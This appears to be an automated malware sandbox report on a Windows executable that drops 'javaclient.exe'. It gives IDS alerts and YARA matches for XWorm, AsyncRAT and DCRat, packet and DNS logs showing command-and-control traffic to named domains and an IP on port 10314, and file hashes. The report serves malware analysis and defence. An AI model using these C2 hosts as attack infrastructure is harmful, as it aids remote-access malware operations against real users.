                                    RT_GROUP_ICON | 0x136984 | 0x14 | Targa image data - Map 65536 x 26706 x 1 | | | 0.85
                                    RT_VERSION | 0x136998 | 0x264 | data | | | 0.46405228758169936
                                    RT_MANIFEST | 0x136bfc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                    DLL | Import
                                    mscoree.dll | _CorExeMain
                                    Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                    2024-08-06T11:52:51.212378+0200 | TCP | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49716 | 10314 | 192.168.2.9 | 147.185.221.17
                                    2024-08-06T11:54:05.009491+0200 | TCP | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    2024-08-06T11:54:31.399989+0200 | TCP | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49721 | 10314 | 192.168.2.9 | 147.185.221.17
                                    2024-08-06T11:52:15.171137+0200 | TCP | 2034194 | ET MALWARE DCRAT Activity (GET) | 49713 | 80 | 192.168.2.9 | 141.8.192.26
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Aug 6, 2024 11:52:15.204010010 CEST | 49715 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:15.208976030 CEST | 10314 | 49715 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:15.209067106 CEST | 49715 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:15.312932014 CEST | 49715 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:15.318523884 CEST | 10314 | 49715 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:28.129138947 CEST | 49715 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:28.134190083 CEST | 10314 | 49715 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:36.583637953 CEST | 10314 | 49715 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:36.583719015 CEST | 49715 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:37.578835011 CEST | 49715 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:37.580859900 CEST | 49716 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:37.583754063 CEST | 10314 | 49715 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:37.585860968 CEST | 10314 | 49716 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:37.585947990 CEST | 49716 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:37.632034063 CEST | 49716 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:37.636888027 CEST | 10314 | 49716 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:51.212378025 CEST | 49716 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:51.217370033 CEST | 10314 | 49716 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:58.958467007 CEST | 10314 | 49716 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:58.958610058 CEST | 49716 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:59.946429014 CEST | 49716 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:59.948026896 CEST | 49718 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:59.954040051 CEST | 10314 | 49716 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:59.954056025 CEST | 10314 | 49718 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:52:59.954145908 CEST | 49718 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:59.985930920 CEST | 49718 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:52:59.990715027 CEST | 10314 | 49718 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:10.181246042 CEST | 49718 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:10.186199903 CEST | 10314 | 49718 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:20.384371996 CEST | 49718 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:20.389317036 CEST | 10314 | 49718 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:21.336042881 CEST | 10314 | 49718 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:21.336179972 CEST | 49718 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:23.946516037 CEST | 49718 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:23.951538086 CEST | 10314 | 49718 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:23.951590061 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:23.956558943 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:23.960261106 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:24.108155012 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:24.121643066 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:25.306302071 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:25.312699080 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:25.854096889 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:25.859817028 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:32.509650946 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:32.514722109 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:45.165755033 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:45.171535969 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:45.365432024 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:45.365518093 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:49.384139061 CEST | 49719 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:49.386205912 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:49.389023066 CEST | 10314 | 49719 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:49.391073942 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:49.391163111 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:49.445847988 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:49.450738907 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:52.821964025 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:52.827009916 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:53.587399960 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:53.592338085 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:53.744182110 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:53.749144077 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:53.808387995 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:53.813395023 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:54.728100061 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:54.733023882 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:54.759284973 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:54.764169931 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:54.774943113 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:54.780409098 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:54.821829081 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:54.827615023 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:53:54.868940115 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:53:54.873809099 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:04.978692055 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:04.983627081 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:04.993729115 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:04.998790026 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:05.009490967 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:05.014538050 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:08.603410006 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:08.608314991 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:09.150120020 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:09.157135010 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.087678909 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.093075037 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.587502956 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.592636108 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.618810892 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.623867989 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.665644884 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.670586109 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.784596920 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.784657001 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.784720898 CEST | 49720 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.786523104 CEST | 49721 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.789978981 CEST | 10314 | 49720 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.791496038 CEST | 10314 | 49721 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.791552067 CEST | 49721 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.824459076 CEST | 49721 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.829489946 CEST | 10314 | 49721 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.837333918 CEST | 49721 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.842308044 CEST | 10314 | 49721 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.852982998 CEST | 49721 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.858230114 CEST | 10314 | 49721 | 147.185.221.17 | 192.168.2.9
                                    Aug 6, 2024 11:54:10.946876049 CEST | 49721 | 10314 | 192.168.2.9 | 147.185.221.17
                                    Aug 6, 2024 11:54:10.951780081 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.978044987 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:10.982917070 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:10.993717909 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.000504017 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:11.087502956 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.092562914 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:11.165716887 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.399656057 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:11.572175026 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:11.572192907 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:16.262171984 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:16.267026901 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:21.290643930 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:21.295595884 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:21.306200981 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:21.310971975 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:24.200282097 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:24.207098961 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:24.463613033 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:24.468488932 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.384494066 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.389445066 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.399988890 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.404858112 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.415654898 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.420597076 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.525007963 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.529776096 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.540590048 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.545418978 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.556302071 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.561737061 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:31.587524891 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:31.592550039 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:32.174336910 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:32.176444054 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.587559938 CEST4972110314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.590099096 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.592533112 CEST1031449721147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:36.596695900 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:36.600311041 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.640774012 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:36.645754099 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:39.728104115 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:39.732950926 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:39.837474108 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:39.842271090 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.853204012 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.858035088 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.884407997 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.889238119 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.915589094 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.920523882 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.931184053 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.936062098 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.946804047 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.951761007 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:46.993815899 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:46.998617887 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.150067091 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.155827045 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.181229115 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.186079979 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.259438038 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.265279055 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.290618896 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.296366930 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.353154898 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.358015060 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.368802071 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.373625040 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.447009087 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:54:57.451780081 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.957221031 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:54:57.957381964 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.540446043 CEST4972210314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.545577049 CEST1031449722147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.545618057 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.552265882 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.554382086 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.697635889 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.703696012 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.743771076 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.749281883 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.759287119 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.765109062 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:02.806643009 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:02.811999083 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:09.886271000 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:09.891169071 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:11.884634018 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:11.891197920 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:12.884433985 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:12.889547110 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:12.915648937 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:12.922849894 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:23.925520897 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:23.926397085 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.182284117 CEST4972310314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.186286926 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.187163115 CEST1031449723147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:28.191294909 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:28.191481113 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.330308914 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:28.335269928 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:28.837698936 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:29.001611948 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:32.790692091 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:32.795619965 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:33.790800095 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:33.795583963 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:34.806401968 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:34.811228037 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:37.915734053 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:37.920970917 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:38.606292009 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:38.611205101 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:39.337712049 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:39.342665911 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.900424957 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.905422926 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.931473970 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.936513901 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.947096109 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.951898098 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:48.993905067 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:48.998809099 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:49.150172949 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:49.155101061 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:49.584239960 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:49.584310055 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.181399107 CEST4972410314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.185331106 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.186306953 CEST1031449724147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:54.190186024 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:54.194448948 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.281335115 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.286452055 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:54.293327093 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:54.298242092 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:55:55.322115898 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:55:55.327289104 CEST1031449725147.185.221.17192.168.2.9
                                    Aug 6, 2024 11:56:02.291069031 CEST4972510314192.168.2.9147.185.221.17
                                    Aug 6, 2024 11:56:02.296155930 CEST1031449725147.185.221.17192.168.2.9
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Aug 6, 2024 11:52:14.402239084 CEST | 59627 | 53 | 192.168.2.9 | 1.1.1.1
                                    Aug 6, 2024 11:52:14.451356888 CEST | 53 | 59627 | 1.1.1.1 | 192.168.2.9
                                    Aug 6, 2024 11:52:15.159441948 CEST | 61254 | 53 | 192.168.2.9 | 1.1.1.1
                                    Aug 6, 2024 11:52:15.199506998 CEST | 53 | 61254 | 1.1.1.1 | 192.168.2.9

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Aug 6, 2024 11:52:14.402239084 CEST | 192.168.2.9 | 1.1.1.1 | 0x840a | Standard query (0) | a1013249.xsph.ru | A (IP address) | IN (0x0001) | false
                                    Aug 6, 2024 11:52:15.159441948 CEST | 192.168.2.9 | 1.1.1.1 | 0x9f9a | Standard query (0) | light-liable.gl.at.ply.gg | A (IP address) | IN (0x0001) | false

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Aug 6, 2024 11:51:49.928139925 CEST | 1.1.1.1 | 192.168.2.9 | 0xbecc | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                    Aug 6, 2024 11:51:49.928139925 CEST | 1.1.1.1 | 192.168.2.9 | 0xbecc | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                    Aug 6, 2024 11:52:14.451356888 CEST | 1.1.1.1 | 192.168.2.9 | 0x840a | No error (0) | a1013249.xsph.ru | | 141.8.192.26 | A (IP address) | IN (0x0001) | false
                                    Aug 6, 2024 11:52:15.199506998 CEST | 1.1.1.1 | 192.168.2.9 | 0x9f9a | No error (0) | light-liable.gl.at.ply.gg | | 147.185.221.17 | A (IP address) | IN (0x0001) | false

                                    Target ID:0
                                    Start time:05:51:53
                                    Start date:06/08/2024
                                    Path:C:\Users\user\Desktop\cougif6lqM.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\cougif6lqM.exe"
                                    Imagebase:0xd70000
                                    File size:1'265'664 bytes
                                    MD5 hash:2BBC8212C548DCB848224A882B32492A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:05:51:56
                                    Start date:06/08/2024
                                    Path:C:\Users\user\AppData\Local\Temp\javaclient.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Temp\javaclient.exe"
                                    Imagebase:0xec0000
                                    File size:151'040 bytes
                                    MD5 hash:2F969595E0DD360ECD52126BF5ECE5E5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
